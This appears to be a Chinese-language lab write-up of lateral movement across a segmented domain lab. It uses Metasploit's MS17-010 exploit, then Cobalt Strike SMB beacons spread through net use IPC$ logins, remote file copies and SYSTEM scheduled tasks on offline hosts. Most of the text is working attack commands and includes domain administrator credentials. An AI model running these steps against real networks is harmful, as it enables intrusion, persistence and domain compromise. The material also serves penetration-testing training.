以前讲过用cs_smb_beacon上线不出网机器,但是真实的网络拓扑肯定不止这么一层的网络!
所以我就来搭建一个复杂一点的网络环境!!
当然了,这三台电脑之间都是不同的网段,(但是同属于一个域环境!!)
来看网络拓扑!!
这里拿下的方式有很多种,那么我就先讲最简单的一种,没错又是永恒之蓝,但是现实生活中肯定是不会将一台存在永恒之蓝的win7作为web机器的!!
kali:
msfconsole
search ms17-010
use 0
- set rhost 192.168.43.131
- exploit
成功拿下shell
于是先上线到cs!! 监听器,木马这些我就不多说原理了
记得选上这个没有(stagless)的木马
然后上传,点击上线,可谓是一气呵成!!!
这样,我们就上线了第一台web机器!!!
这里我选择生成的监听器还是smb的beacon
然后木马那里就要选择带有stageless的那个木马了,然后先上传到web机器!!!
然后就是我们熟悉的颁布计划任务了!!!
- net use \\192.168.2.129\ipc$ "hongrisec@2024" /user:god\administrator
-
- shell net use
-
- shell copy beacon.exe \\192.168.2.129\c$
-
- shell schtasks /create /s 192.168.2.129 /tn beacon /sc onstart /tr c:\beacon.exe /ru system /f
-
- shell schtasks /run /s 192.168.2.129 /i /tn "beacon"
-
- link 192.168.2.129
这样就能上线了第二层不出网的域控!!!
这里的操作和前面的操作不一样,前面的连接都是用的正向连接,现在我们来玩一下反向连接
先在cs执行以下操作,选择转发上线!!!
然后你生成一个监听器就是记住你的端口别冲突了!!
然后就是生成以这个为监听器的木马,并且颁布计划任务了
- net use \\192.168.1.130\ipc$ "hongrisec@2024" /user:god\administrator
-
- shell net use
-
- shell copy last.exe \\192.168.1.130\c$
-
- shell schtasks /create /s 192.168.1.130 /tn last /sc onstart /tr c:\last.exe /ru system /f
-
- shell schtasks /run /s 192.168.1.130 /i /tn "last"
-
- link 192.168.1.130
最后是能看见是能够以last.exe去上线这个木马的!!!
可以看见是能够执行命令的